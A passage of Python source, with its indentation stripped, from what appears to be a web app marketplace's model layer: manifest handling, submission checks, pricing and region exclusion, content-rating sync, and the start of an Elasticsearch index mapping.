def domain_from_url(url, allow_none=False):
if not url:
if allow_none:
return
raise ValueError('URL was empty')
pieces = urlparse.urlparse(url)
return '%s://%s' % (pieces.scheme, pieces.netloc.lower())
@property
def punycode_app_domain(self):
return self.app_domain.encode('idna')
@property
def parsed_app_domain(self):
if self.is_packaged:
raise ValueError('Packaged apps do not have a domain')
return urlparse.urlparse(self.app_domain)
@property
def device_types(self):
# If the transformer attached something, use it.
if hasattr(self, '_device_types'):
return self._device_types
return [DEVICE_TYPES[d.device_type] for d in
self.addondevicetype_set.order_by('device_type')]
@property
def origin(self):
if self.is_packaged:
return self.app_domain
parsed = urlparse.urlparse(self.get_manifest_url())
return '%s://%s' % (parsed.scheme, parsed.netloc)
def get_manifest_url(self, reviewer=False):
"""
Hosted apps: a URI to an external manifest.
Packaged apps: a URI to a mini manifest on m.m.o. If reviewer, the
mini-manifest behind reviewer auth pointing to the reviewer-signed
package.
"""
if self.is_packaged:
if reviewer and self.latest_version:
# Get latest version and return reviewer manifest URL.
version = self.latest_version
return absolutify(reverse('reviewers.mini_manifest',
args=[self.app_slug, version.id]))
elif self.current_version:
return absolutify(reverse('detail.manifest', args=[self.guid]))
else:
return '' # No valid version.
else:
return self.manifest_url
def has_icon_in_manifest(self):
data = self.get_manifest_json()
return 'icons' in data
def get_manifest_json(self, file_obj=None):
file_ = file_obj or self.get_latest_file()
if not file_:
return
try:
return file_.version.manifest
except AppManifest.DoesNotExist:
# TODO: Remove this when we're satisified the above is working.
log.info('Falling back to loading manifest from file system. '
'Webapp:%s File:%s' % (self.id, file_.id))
if file_.status == amo.STATUS_DISABLED:
file_path = file_.guarded_file_path
else:
file_path = file_.file_path
return WebAppParser().get_json_data(file_path)
def manifest_updated(self, manifest, upload):
"""The manifest has updated, update the version and file.
This is intended to be used for hosted apps only, which have only a
single version and a single file.
"""
data = parse_addon(upload, self)
manifest = WebAppParser().get_json_data(upload)
version = self.versions.latest()
max_ = Version._meta.get_field_by_name('_developer_name')[0].max_length
version.update(version=data['version'],
_developer_name=data['developer_name'][:max_])
try:
version.manifest_json.update(manifest=json.dumps(manifest))
except AppManifest.DoesNotExist:
AppManifest.objects.create(version=version,
manifest=json.dumps(manifest))
path = smart_path(nfd_str(upload.path))
file = version.files.latest()
file.filename = file.generate_filename(extension='.webapp')
file.size = storage.size(path)
file.hash = file.generate_hash(path)
log.info('Updated file hash to %s' % file.hash)
file.save()
# Move the uploaded file from the temp location.
copy_stored_file(path, os.path.join(version.path_prefix,
nfd_str(file.filename)))
log.info('[Webapp:%s] Copied updated manifest to %s' % (
self, version.path_prefix))
amo.log(amo.LOG.MANIFEST_UPDATED, self)
def has_incomplete_status(self):
return self.is_incomplete()
def details_errors(self):
"""
See if initial app submission is complete (details).
Returns list of reasons app may not be complete.
"""
reasons = []
if not self.support_email:
reasons.append(_('You must provide a support email.'))
if not self.name:
reasons.append(_('You must provide an app name.'))
if not self.device_types:
reasons.append(_('You must provide at least one device type.'))
if not self.categories.count():
reasons.append(_('You must provide at least one category.'))
if not self.previews.count():
reasons.append(_('You must upload at least one screenshot or '
'video.'))
return reasons
def details_complete(self):
"""
Checks if app detail submission is complete (first step of submit).
"""
return not self.details_errors()
def is_rated(self):
return self.content_ratings.exists()
def content_ratings_complete(self):
"""Checks for waffle."""
return not waffle.switch_is_active('iarc') or self.is_rated()
def all_payment_accounts(self):
# TODO: cache this somehow. Using @cached_property was hard because
# there's no easy way to invalidate something that should be
# recalculated.
return (self.app_payment_accounts.select_related('payment_account')
.all())
def payment_account(self, provider_id):
qs = (self.app_payment_accounts.select_related('payment_account')
.filter(payment_account__provider=provider_id))
try:
return qs.get()
except AddonPaymentAccount.DoesNotExist, exc:
log.info('non-existant payment account for app {app}: '
'{exc.__class__.__name__}: {exc}'
.format(app=self, exc=exc))
raise self.PayAccountDoesNotExist(
'No payment account for {app} named {pr}. '
'Choices: {all}'
.format(app=self,
pr=PROVIDER_CHOICES[provider_id],
all=[PROVIDER_CHOICES[a.payment_account.provider]
for a in self.all_payment_accounts()]))
def has_payment_account(self):
"""True if app has at least one payment account."""
return bool(self.all_payment_accounts().count())
def has_multiple_payment_accounts(self):
"""True if the app has more than one payment account."""
return self.all_payment_accounts().count() > 1
def payments_complete(self):
"""Also returns True if the app doesn't needs payments."""
return not self.needs_payment() or self.has_payment_account()
def completion_errors(self, ignore_ratings=False):
"""
Compiles all submission steps into a single error report.
ignore_ratings -- doesn't check for content_ratings for cases in which
content ratings were just created.
"""
errors = {}
if not self.details_complete():
errors['details'] = self.details_errors()
if not ignore_ratings and not self.content_ratings_complete():
errors['content_ratings'] = _('You must set up content ratings.')
if not self.payments_complete():
errors['payments'] = _('You must set up a payment account.')
return errors
def completion_error_msgs(self):
"""Returns submission error messages as a flat list."""
errors = self.completion_errors()
# details is a list of msgs instead of a string like others.
detail_errors = errors.pop('details', []) or []
return detail_errors + errors.values()
def is_fully_complete(self, ignore_ratings=False):
"""
Wrapper to submission errors for readability and testability (mocking).
"""
return not self.completion_errors(ignore_ratings)
def next_step(self):
"""
Gets the next step to fully complete app submission.
"""
if self.has_incomplete_status() and not self.details_complete():
# Some old public apps may have some missing detail fields.
return {
'name': _('Details'),
'description': _('This app\'s submission process has not been '
'fully completed.'),
'url': self.get_dev_url(),
}
elif not self.content_ratings_complete():
return {
'name': _('Content Ratings'),
'description': _('This app needs to get a content rating.'),
'url': self.get_dev_url('ratings'),
}
elif not self.payments_complete():
return {
'name': _('Payments'),
'description': _('This app needs a payment account set up.'),
'url': self.get_dev_url('payments'),
}
@amo.cached_property(writable=True)
def is_offline(self):
"""
Returns a boolean of whether this is an app that degrades
gracefully offline (i.e., is a packaged app or has an
`appcache_path` defined in its manifest).
"""
if self.is_packaged:
return True
manifest = self.get_manifest_json()
return bool(manifest and 'appcache_path' in manifest)
def mark_done(self):
"""When the submission process is done, update status accordingly."""
self.update(status=amo.WEBAPPS_UNREVIEWED_STATUS)
def update_status(self, **kwargs):
if (self.is_deleted or self.is_disabled or
self.status == amo.STATUS_BLOCKED):
return
def _log(reason, old=self.status):
log.info(u'Update app status [%s]: %s => %s (%s).' % (
self.id, old, self.status, reason))
amo.log(amo.LOG.CHANGE_STATUS, self.get_status_display(), self)
# Handle the case of no versions.
if not self.versions.exists():
self.update(status=amo.STATUS_NULL)
_log('no versions')
return
# Handle the case of versions with no files.
if not self.versions.filter(files__isnull=False).exists():
self.update(status=amo.STATUS_NULL)
_log('no versions with files')
return
# If the app is incomplete, don't update status.
if not self.is_fully_complete():
return
# If there are no public versions and at least one pending, set status
# to pending.
public_statuses = amo.WEBAPPS_APPROVED_STATUSES
has_public = (
self.versions.filter(files__status__in=public_statuses).exists()
)
has_pending = (
self.versions.filter(files__status=amo.STATUS_PENDING).exists())
# Check for self.is_pending() first to prevent possible recursion.
if not has_public and has_pending and not self.is_pending():
self.update(status=amo.STATUS_PENDING)
_log('has pending but no public files')
return
def authors_other_addons(self, app=None):
"""Return other apps by the same author."""
return (self.__class__.objects.visible()
.filter(type=amo.ADDON_WEBAPP)
.exclude(id=self.id).distinct()
.filter(addonuser__listed=True,
authors__in=self.listed_authors))
def can_be_purchased(self):
return self.is_premium() and self.status in amo.REVIEWED_STATUSES
def can_purchase(self):
return self.is_premium() and self.premium and self.is_public()
def is_purchased(self, user):
return user and self.id in user.purchase_ids()
def is_pending(self):
return self.status == amo.STATUS_PENDING
def is_visible(self, request):
"""Returns whether the app has a visible search result listing. Its
detail page will always be there.
This does not consider whether an app is excluded in the current region
by the developer.
"""
# Let developers see it always.
can_see = (self.has_author(request.amo_user) or
action_allowed(request, 'Apps', 'Edit'))
# Let app reviewers see it only when it's pending.
if check_reviewer(request, only='app') and self.is_pending():
can_see = True
visible = False
if can_see:
# Developers and reviewers should see it always.
visible = True
elif self.is_public():
# Everyone else can see it only if it's public -
# and if it's a game, it must have a content rating.
visible = True
return visible
def has_premium(self):
"""If the app is premium status and has a premium object."""
return bool(self.is_premium() and self.premium)
def get_price(self, carrier=None, region=None, provider=None):
"""
A shortcut to get the price as decimal. Returns None if their is no
price for the app.
:param optional carrier: an int for the carrier.
:param optional region: an int for the region. Defaults to restofworld.
:param optional provider: an int for the provider. Defaults to bango.
"""
if self.has_premium() and self.premium.price:
return self.premium.price.get_price(carrier=carrier, region=region,
provider=provider)
def get_price_locale(self, carrier=None, region=None, provider=None):
"""
A shortcut to get the localised price with currency. Returns None if
their is no price for the app.
:param optional carrier: an int for the carrier.
:param optional region: an int for the region. Defaults to restofworld.
:param optional provider: an int for the provider. Defaults to bango.
"""
if self.has_premium() and self.premium.price:
return self.premium.price.get_price_locale(
carrier=carrier, region=region, provider=provider)
def get_tier(self):
"""
Returns the price tier object.
"""
if self.has_premium():
return self.premium.price
def get_tier_name(self):
"""
Returns the price tier for showing prices in the reviewer
tools and developer hub.
"""
tier = self.get_tier()
if tier:
return tier.tier_locale()
@amo.cached_property
def promo(self):
return self.get_promo()
def get_promo(self):
try:
return self.previews.filter(position=-1)[0]
except IndexError:
pass
def get_region_ids(self, restofworld=False, excluded=None):
"""
Return IDs of regions in which this app is listed.
If `excluded` is provided we'll use that instead of doing our own
excluded lookup.
"""
if restofworld:
all_ids = mkt.regions.ALL_REGION_IDS
else:
all_ids = mkt.regions.REGION_IDS
if excluded is None:
excluded = list(self.addonexcludedregion
.values_list('region', flat=True))
return sorted(set(all_ids) - set(excluded or []))
def get_excluded_region_ids(self):
"""
Return IDs of regions for which this app is excluded.
This will be all the addon excluded regions. If the app is premium,
this will also exclude any region that does not have the price tier
set.
Note: free and in-app are not included in this.
"""
excluded = set(self.addonexcludedregion
.values_list('region', flat=True))
if self.is_premium():
all_regions = set(mkt.regions.ALL_REGION_IDS)
# Find every region that does not have payments supported
# and add that into the exclusions.
excluded = excluded.union(
all_regions.difference(self.get_price_region_ids()))
geo = self.geodata
if geo.region_de_iarc_exclude or geo.region_de_usk_exclude:
excluded.add(mkt.regions.DE.id)
if geo.region_br_iarc_exclude:
excluded.add(mkt.regions.BR.id)
return sorted(list(excluded))
def get_price_region_ids(self):
tier = self.get_tier()
if tier:
return sorted(p['region'] for p in tier.prices() if p['paid'])
return []
def get_regions(self, regions=None):
"""
Return a list of regions objects the app is available in, e.g.:
[<class 'mkt.constants.regions.BR'>,
<class 'mkt.constants.regions.CA'>,
<class 'mkt.constants.regions.UK'>,
<class 'mkt.constants.regions.US'>,
<class 'mkt.constants.regions.RESTOFWORLD'>]
if `regions` is provided we'll use that instead of calling
self.get_region_ids()
"""
regions_ids = regions or self.get_region_ids(restofworld=True)
_regions = map(mkt.regions.REGIONS_CHOICES_ID_DICT.get, regions_ids)
return sorted(_regions, key=lambda x: x.slug)
def listed_in(self, region=None, category=None):
listed = []
if region:
listed.append(region.id in self.get_region_ids(restofworld=True))
if category:
if isinstance(category, basestring):
filters = {'slug': category}
else:
filters = {'id': category.id}
listed.append(self.category_set.filter(**filters).exists())
return all(listed or [False])
def content_ratings_in(self, region, category=None):
"""
Get all content ratings for this app in REGION for CATEGORY.
(e.g. give me the content ratings for a game listed in a Brazil.)
"""
# If we want to find games in Brazil with content ratings, then
# make sure it's actually listed in Brazil and it's a game.
if category and not self.listed_in(region, category):
return []
rb = []
if not region.ratingsbody:
# If a region doesn't specify a ratings body, default to GENERIC.
rb = mkt.ratingsbodies.GENERIC.id
else:
rb = region.ratingsbody.id
return list(self.content_ratings.filter(ratings_body=rb)
.order_by('rating'))
@classmethod
def now(cls):
return datetime.date.today()
@classmethod
def from_search(cls, request, cat=None, region=None, gaia=False,
mobile=False, tablet=False, filter_overrides=None):
filters = {
'type': amo.ADDON_WEBAPP,
'status': amo.STATUS_PUBLIC,
'is_disabled': False,
}
# Special handling if status is 'any' to remove status filter.
if filter_overrides and 'status' in filter_overrides:
if filter_overrides['status'] is 'any':
del filters['status']
del filter_overrides['status']
if filter_overrides:
filters.update(filter_overrides)
if cat:
filters.update(category=cat.slug)
srch = S(WebappIndexer).filter(**filters)
if (region and
not waffle.flag_is_active(request, 'override-region-exclusion')):
srch = srch.filter(~F(region_exclusions=region.id))
if mobile or gaia:
srch = srch.filter(uses_flash=False)
return srch
@classmethod
def category(cls, slug):
try:
return (Category.objects
.filter(type=amo.ADDON_WEBAPP, slug=slug))[0]
except IndexError:
return None
def in_rereview_queue(self):
return self.rereviewqueue_set.exists()
def get_cached_manifest(self, force=False):
"""
Creates the "mini" manifest for packaged apps and caches it.
Call this with `force=True` whenever we need to update the cached
version of this manifest, e.g., when a new version of the packaged app
is approved.
If the addon is not a packaged app, this will not cache anything.
"""
if not self.is_packaged:
return
key = 'webapp:{0}:manifest'.format(self.pk)
if not force:
data = cache.get(key)
if data:
return data
version = self.current_version
if not version:
# There's no valid version so we return an empty mini-manifest.
# Note: We want to avoid caching this so when a version does become
# available it can get picked up correctly.
return '{}'
else:
file_obj = version.all_files[0]
manifest = self.get_manifest_json(file_obj)
package_path = absolutify(
os.path.join(reverse('downloads.file', args=[file_obj.id]),
file_obj.filename))
data = {
'name': manifest['name'],
'version': version.version,
'size': storage.size(file_obj.signed_file_path),
'release_notes': version.releasenotes,
'package_path': package_path,
}
for key in ['developer', 'icons', 'locales']:
if key in manifest:
data[key] = manifest[key]
data = json.dumps(data, cls=JSONEncoder)
cache.set(key, data, None)
return data
def sign_if_packaged(self, version_pk, reviewer=False):
if not self.is_packaged:
return
return packaged.sign(version_pk, reviewer=reviewer)
def assign_uuid(self):
"""Generates a UUID if self.guid is not already set."""
if not self.guid:
max_tries = 10
tried = 1
guid = str(uuid.uuid4())
while tried <= max_tries:
if not Webapp.objects.filter(guid=guid).exists():
self.guid = guid
break
else:
guid = str(uuid.uuid4())
tried += 1
else:
raise ValueError('Could not auto-generate a unique UUID')
def is_premium_type_upgrade(self, premium_type):
"""
Returns True if changing self.premium_type from current value to passed
in value is considered an upgrade that should trigger a re-review.
"""
ALL = set(amo.ADDON_FREES + amo.ADDON_PREMIUMS)
free_upgrade = ALL - set([amo.ADDON_FREE])
free_inapp_upgrade = ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP])
if (self.premium_type == amo.ADDON_FREE and
premium_type in free_upgrade):
return True
if (self.premium_type == amo.ADDON_FREE_INAPP and
premium_type in free_inapp_upgrade):
return True
return False
def create_blocklisted_version(self):
"""
Creates a new version who's file is the blocklisted app found in /media
and sets status to STATUS_BLOCKLISTED.
"""
blocklisted_path = os.path.join(settings.MEDIA_ROOT, 'packaged-apps',
'blocklisted.zip')
v = Version.objects.create(addon=self, version='blocklisted')
f = File(version=v, status=amo.STATUS_BLOCKED,
platform=Platform.objects.get(id=amo.PLATFORM_ALL.id))
f.filename = f.generate_filename()
copy_stored_file(blocklisted_path, f.file_path)
log.info(u'[Webapp:%s] Copied blocklisted app from %s to %s' % (
self.id, blocklisted_path, f.file_path))
f.size = storage.size(f.file_path)
f.hash = f.generate_hash(f.file_path)
f.save()
mf = WebAppParser().get_json_data(f.file_path)
AppManifest.objects.create(version=v, manifest=json.dumps(mf))
self.sign_if_packaged(v.pk)
self.status = amo.STATUS_BLOCKED
self._current_version = v
self.save()
def update_name_from_package_manifest(self):
"""
Looks at the manifest.webapp inside the current version's file and
updates the app's name and translated names.
Note: Make sure the correct version is in place before calling this.
"""
if not self.is_packaged:
return None
file_ = self.current_version.all_files[0]
mf = self.get_manifest_json(file_)
# Get names in "locales" as {locale: name}.
locale_names = get_locale_properties(mf, 'name', self.default_locale)
# Check changes to default_locale.
locale_changed = self.update_default_locale(mf.get('default_locale'))
if locale_changed:
log.info(u'[Webapp:%s] Default locale changed from "%s" to "%s".'
% (self.pk, locale_changed[0], locale_changed[1]))
# Update names
crud = self.update_names(locale_names)
if any(crud.values()):
self.save()
def update_supported_locales(self, latest=False, manifest=None):
"""
Loads the manifest (for either hosted or packaged) and updates
Version.supported_locales for the current version or latest version if
latest=True.
"""
version = self.versions.latest() if latest else self.current_version
if not manifest:
file_ = version.all_files[0]
manifest = self.get_manifest_json(file_)
updated = False
supported_locales = ','.join(get_supported_locales(manifest))
if version.supported_locales != supported_locales:
updated = True
version.update(supported_locales=supported_locales, _signal=False)
return updated
@property
def app_type_id(self):
"""
Returns int of `1` (hosted), `2` (packaged), or `3` (privileged).
Used by ES.
"""
if self.latest_version and self.latest_version.is_privileged:
return amo.ADDON_WEBAPP_PRIVILEGED
elif self.is_packaged:
return amo.ADDON_WEBAPP_PACKAGED
return amo.ADDON_WEBAPP_HOSTED
@property
def app_type(self):
"""
Returns string of 'hosted', 'packaged', or 'privileged'.
Used in the API.
"""
return amo.ADDON_WEBAPP_TYPES[self.app_type_id]
@property
def supported_locales(self):
"""
Returns a tuple of the form:
(localized default_locale, list of localized supported locales)
for the current public version.
"""
languages = []
version = self.current_version
if version:
for locale in version.supported_locales.split(','):
if locale:
language = settings.LANGUAGES.get(locale.lower())
if language:
languages.append(language)
return (
settings.LANGUAGES.get(self.default_locale.lower()),
sorted(languages)
)
@property
def developer_name(self):
"""This is the developer name extracted from the manifest."""
if self.current_version:
return self.current_version.developer_name
def get_trending(self, region=None):
"""
Returns trending value.
If no region, uses global value.
If region and region is not mature, uses global value.
Otherwise uses regional trending value.
"""
if region and not region.adolescent:
by_region = region.id
else:
by_region = 0
try:
return self.trending.get(region=by_region).value
except ObjectDoesNotExist:
return 0
def iarc_token(self):
"""
Simple hash to verify token in pingback API.
"""
return hashlib.sha512(settings.SECRET_KEY + str(self.id)).hexdigest()
def get_content_ratings_by_body(self, es=False):
"""
Gets content ratings on this app keyed by bodies.
es -- denotes whether to return ES-friendly results (just the IDs of
rating classes) to fetch and translate later.
"""
content_ratings = {}
for cr in self.content_ratings.all():
body = cr.get_body()
rating_serialized = {
'body': body.id,
'rating': cr.get_rating().id
}
if not es:
rating_serialized = dehydrate_content_rating(rating_serialized)
content_ratings[body.label] = rating_serialized
return content_ratings
def get_descriptors_slugs(self):
"""
Return list of content descriptor slugs (e.g., ['has_esrb_drugs'...]).
"""
try:
app_descriptors = self.rating_descriptors
except RatingDescriptors.DoesNotExist:
return []
descriptors = []
for key in mkt.ratingdescriptors.RATING_DESCS.keys():
field = 'has_%s' % key.lower() # Build the field name.
if getattr(app_descriptors, field):
descriptors.append(key)
return descriptors
def get_interactives_slugs(self):
"""
Return list of interactive element slugs (e.g., ['shares_info'...]).
"""
try:
app_interactives = self.rating_interactives
except RatingInteractives.DoesNotExist:
return []
interactives = []
for key in mkt.ratinginteractives.RATING_INTERACTIVES.keys():
field = 'has_%s' % key.lower()
if getattr(app_interactives, field):
interactives.append(key)
return interactives
def get_descriptors_dehydrated(self):
"""
Return lists of descriptors slugs by body
(e.g., {'esrb': ['real-gambling'], 'pegi': ['scary']}).
"""
return dehydrate_descriptors(self.get_descriptors_slugs())
def get_interactives_dehydrated(self):
"""
Return lists of interactive element slugs
(e.g., ['shares-info', 'shares-location']).
"""
return dehydrate_interactives(self.get_interactives_slugs())
def get_descriptors_full(self):
"""
Return descriptor objects (label, name) by body.
(e.g., {'esrb': {'label': 'blood', 'name': 'Blood'}}).
"""
keys = self.get_descriptors_slugs()
results = defaultdict(list)
for key in keys:
obj = mkt.ratingdescriptors.RATING_DESCS.get(key)
if obj:
# Slugify and remove body prefix.
body, label = key.lower().replace('_', '-').split('-', 1)
results[body].append({
'label': label,
'name': unicode(obj['name']),
})
return dict(results)
def get_interactives_full(self):
"""
Return list of interactive element objects (label, name).
e.g., [{'label': 'social-networking', 'name': 'Facebocks'}, ...].
"""
keys = self.get_interactives_slugs()
results = []
for key in keys:
obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key)
if obj:
results.append({
'label': key.lower().replace('_', '-'),
'name': unicode(obj['name']),
})
return results
def set_iarc_info(self, submission_id, security_code):
"""
Sets the iarc_info for this app.
"""
data = {'submission_id': submission_id,
'security_code': security_code}
info, created = IARCInfo.objects.safer_get_or_create(
addon=self, defaults=data)
if not created:
info.update(**data)
@write
def set_content_ratings(self, data):
"""
Central method for setting content ratings.
This overwrites or creates ratings, it doesn't delete and expects data
of the form::
{<ratingsbodies class>: <rating class>, ...}
"""
from . import tasks
if not data:
return
log.info('IARC setting content ratings for app:%s:%s' %
(self.id, self.app_slug))
for ratings_body, rating in data.items():
cr, created = self.content_ratings.safer_get_or_create(
ratings_body=ratings_body.id, defaults={'rating': rating.id})
if not created:
cr.update(rating=rating.id, modified=datetime.datetime.now())
log.info('IARC content ratings set for app:%s:%s' %
(self.id, self.app_slug))
self.set_iarc_storefront_data() # Ratings updated, sync with IARC.
geodata, c = Geodata.objects.get_or_create(addon=self)
save = False
# If app gets USK Rating Refused, exclude it from Germany.
has_usk_refused = self.content_ratings.filter(
ratings_body=mkt.ratingsbodies.USK.id,
rating=mkt.ratingsbodies.USK_REJECTED.id).exists()
save = geodata.region_de_usk_exclude != has_usk_refused
geodata.region_de_usk_exclude = has_usk_refused
# Un-exclude games in Brazil/Germany once they get a content rating.
save = (save or
geodata.region_br_iarc_exclude or
geodata.region_de_iarc_exclude)
geodata.region_br_iarc_exclude = False
geodata.region_de_iarc_exclude = False
# Un-disable apps that were disabled by the great IARC purge.
if (self.status == amo.STATUS_DISABLED and self.iarc_purged):
self.update(status=amo.STATUS_PUBLIC, iarc_purged=False)
if save:
geodata.save()
log.info('Un-excluding IARC-excluded app:%s from br/de')
tasks.index_webapps.delay([self.id])
@write
def set_descriptors(self, data):
"""
Sets IARC rating descriptors on this app.
This overwrites or creates elements, it doesn't delete and expects data
of the form:
[<has_descriptor_1>, <has_descriptor_6>]
"""
log.info('IARC setting descriptors for app:%s:%s' %
(self.id, self.app_slug))
create_kwargs = {}
for desc in mkt.ratingdescriptors.RATING_DESCS.keys():
has_desc_attr = 'has_%s' % desc.lower()
create_kwargs[has_desc_attr] = has_desc_attr in data
rd, created = RatingDescriptors.objects.get_or_create(
addon=self, defaults=create_kwargs)
if not created:
rd.update(modified=datetime.datetime.now(),
**create_kwargs)
log.info('IARC descriptors set for app:%s:%s' %
(self.id, self.app_slug))
@write
def set_interactives(self, data):
"""
Sets IARC interactive elements on this app.
This overwrites or creates elements, it doesn't delete and expects data
of the form:
[<has_interactive_1>, <has_interactive name 2>]
"""
create_kwargs = {}
for interactive in mkt.ratinginteractives.RATING_INTERACTIVES.keys():
interactive = 'has_%s' % interactive.lower()
create_kwargs[interactive] = interactive in map(
lambda x: x.lower(), data)
ri, created = RatingInteractives.objects.get_or_create(
addon=self, defaults=create_kwargs)
if not created:
ri.update(**create_kwargs)
log.info('IARC interactive elements set for app:%s:%s' %
(self.id, self.app_slug))
def set_iarc_storefront_data(self, disable=False):
"""Send app data to IARC for them to verify."""
if not waffle.switch_is_active('iarc'):
return
try:
iarc_info = self.iarc_info
except IARCInfo.DoesNotExist:
# App wasn't rated by IARC, return.
return
release_date = datetime.date.today()
if self.status in amo.WEBAPPS_APPROVED_STATUSES:
version = self.current_version
if version and version.reviewed:
release_date = version.reviewed
elif self.status in amo.WEBAPPS_EXCLUDED_STATUSES:
# Using `_latest_version` since the property returns None when
# deleted.
version = self._latest_version
# Send an empty string to signify the app was removed.
release_date = ''
else:
# If not approved or one of the disabled statuses, we shouldn't be
# calling SET_STOREFRONT_DATA. Ignore this call.
return
log.debug('Calling SET_STOREFRONT_DATA for app:%s' % self.id)
xmls = []
for cr in self.content_ratings.all():
xmls.append(render_xml('set_storefront_data.xml', {
'app_url': self.get_url_path(),
'submission_id': iarc_info.submission_id,
'security_code': iarc_info.security_code,
'rating_system': cr.get_body().iarc_name,
'release_date': '' if disable else release_date,
'title': get_iarc_app_title(self),
'company': version.developer_name if version else '',
'rating': cr.get_rating().iarc_name,
'descriptors': self.rating_descriptors.iarc_deserialize(
body=cr.get_body()),
'interactive_elements':
self.rating_interactives.iarc_deserialize(),
}))
for xml in xmls:
r = get_iarc_client('services').Set_Storefront_Data(XMLString=xml)
log.debug('IARC result app:%s, rating_body:%s: %s' % (
self.id, cr.get_body().iarc_name, r))
def last_rated_time(self):
"""Most recent content rating modified time or None if not rated."""
if self.is_rated():
return self.content_ratings.order_by('-modified')[0].modified
class Trending(amo.models.ModelBase):
addon = models.ForeignKey(Addon, related_name='trending')
value = models.FloatField(default=0.0)
# When region=0, it's trending using install counts across all regions.
region = models.PositiveIntegerField(null=False, default=0, db_index=True)
class Meta:
db_table = 'addons_trending'
unique_together = ('addon', 'region')
class WebappIndexer(MappingType, Indexable):
"""
Mapping type for Webapp models.
By default we will return these objects rather than hit the database so
include here all the things we need to avoid hitting the database.
"""
@classmethod
def get_mapping_type_name(cls):
"""
Returns mapping type name which is used as the key in ES_INDEXES to
determine which index to use.
We override this because Webapp is a proxy model to Addon.
"""
return 'webapp'
@classmethod
def get_index(cls):
return settings.ES_INDEXES[cls.get_mapping_type_name()]
@classmethod
def get_model(cls):
return Webapp
@classmethod
def get_settings(cls, settings_override=None):
"""
Returns settings to be passed to ES create_index.
If `settings_override` is provided, this will use `settings_override`
to override the defaults defined here.
"""
default_settings = {
'number_of_replicas': settings.ES_DEFAULT_NUM_REPLICAS,
'number_of_shards': settings.ES_DEFAULT_NUM_SHARDS,
'refresh_interval': '5s',
'store.compress.tv': True,
'store.compress.stored': True,
'analysis': cls.get_analysis(),
}
if settings_override:
default_settings.update(settings_override)
return default_settings
@classmethod
def get_analysis(cls):
"""
Returns the analysis dict to be used in settings for create_index.
For languages that ES supports we define either the minimal or light
stemming, which isn't as aggresive as the snowball stemmer. We also
define the stopwords for that language.
For all languages we've customized we're using the ICU plugin.
"""
filters = {}
analyzers = {}
# Customize the word_delimiter filter to set various options.
filters['custom_word_delimiter'] = {
'type': 'word_delimiter',
'preserve_original': True,
}
# The default is used for fields that need ICU but are composed of
# many languages.
analyzers['default_icu'] = {
'type': 'custom',
'tokenizer': 'icu_tokenizer',
'filter': ['custom_word_delimiter', 'icu_folding',
'icu_normalizer'],
}
for lang, stemmer in amo.STEMMER_MAP.items():
filters['%s_stem_filter' % lang] = {
'type': 'stemmer',
'name': stemmer,
}
filters['%s_stop_filter' % lang] = {
'type': 'stop',
'stopwords': ['_%s_' % lang],
}
analyzers['%s_analyzer' % lang] = {
'type': 'custom',
'tokenizer': 'icu_tokenizer',
'filter': [
'custom_word_delimiter', 'icu_folding', 'icu_normalizer',
'%s_stop_filter' % lang, '%s_stem_filter' % lang
],
}
return {
'analyzer': analyzers,
'filter': filters,
}
@classmethod
def setup_mapping(cls):
"""Creates the ES index/mapping."""
cls.get_es().create_index(cls.get_index(),
{'mappings': cls.get_mapping(),
'settings': cls.get_settings()})
@classmethod
def get_mapping(cls):
doc_type = cls.get_mapping_type_name()
def _locale_field_mapping(field, analyzer):
get_analyzer = lambda a: (
'%s_analyzer' % a if a in amo.STEMMER_MAP else a)
return {'%s_%s' % (field, analyzer): {
'type': 'string', 'analyzer': get_analyzer(analyzer)}}
mapping = {
doc_type: {
# Disable _all field to reduce index size.
'_all': {'enabled': False},
# Add a boost field to enhance relevancy of a document.
'_boost': {'name': '_boost', 'null_value': 1.0},
'properties': {
'id': {'type': 'long'},
'app_slug': {'type': 'string'},
'app_type': {'type': 'byte'},
'author': {'type': 'string'},
'average_daily_users': {'type': 'long'},
'banner_regions': {
'type': 'string',
'index': 'not_analyzed'
},
'bayesian_rating': {'type': 'float'},
'category': {
'type': 'string',
'index': 'not_analyzed'
},
'collection': {
'type': 'nested',
'include_in_parent': True,
'properties': {
'id': {'type': 'long'},
'order': {'type': 'short'}
}
},
'content_descriptors': {
'type': 'string',
'index': 'not_analyzed'
},
'content_ratings': {
'type': 'object',
'dynamic': 'true',
},
'created': {'format': 'dateOptionalTime', 'type': 'date'},
'current_version': {'type': 'string',
'index': 'not_analyzed'},
'default_locale': {'type': 'string',
'index': 'not_analyzed'},
'description': {'type': 'string',
'analyzer': 'default_icu'},
'device': {'type': 'byte'},
'features': {
'type': 'object',
'properties': dict(
('has_%s' % f.lower(), {'type': 'boolean'})
for f in APP_FEATURES)
},
'has_public_stats': {'type': 'boolean'},
'icon_hash': {'type': 'string',
'index': 'not_analyzed'},
'interactive_elements': {
'type': 'string',
'index': 'not_analyzed'
},
'is_disabled': {'type': 'boolean'},
'is_escalated': {'type': 'boolean'},
'is_offline': {'type': 'boolean'},
'last_updated': {'format': 'dateOptionalTime',
'type': 'date'},
'latest_version': {
'type': 'object',
'properties': {
'status': {'type': 'byte'},
'is_privileged': {'type': 'boolean'},
'has_editor_comment': {'type': 'boolean'},
'has_info_request': {'type': 'boolean'},
},
},
'manifest_url': {'type': 'string',
'index': 'not_analyzed'},
'modified': {'format': 'dateOptionalTime',
'type': 'date',
'index': 'not_analyzed'},
# Name for searching.
'name': {'type': 'string', 'analyzer': 'default_icu'},
# Name for sorting.
'name_sort': {'type': 'string', 'index': 'not_analyzed'},
# Name for suggestions.
'name_suggest': {'type': 'completion', 'payloads': True},
'owners': {'type': 'long'},
'popularity': {'type': 'long'},
'premium_type': {'type': 'byte'},
'previews': {
'type': 'object',
'dynamic': 'true',
},
'price_tier': {'type': 'string',
'index': 'not_analyzed'},
'ratings': {
'type': 'object',
'properties': {
'average': {'type': 'float'},
'count': {'type': 'short'},
}
},
'region_exclusions': {'type': 'short'},
'reviewed': {'format': 'dateOptionalTime', 'type': 'date'},
'status': {'type': 'byte'},
'supported_locales': {'type': 'string',
'index': 'not_analyzed'},
'tags': {'type': 'string', 'analyzer': 'simple'},
'type': {'type': 'byte'},
'upsell': {
'type': 'object',
'properties': {
'id': {'type': 'long'},
'app_slug': {'type': 'string',
'index': 'not_analyzed'},
'icon_url': {'type': 'string',
'index': 'not_analyzed'},
'name': {'type': 'string',
'index': 'not_analyzed'},
'region_exclusions': {'type': 'short'},
}
},
'uses_flash': {'type': 'boolean'},
'versions': {
'type': 'object',
'properties': {
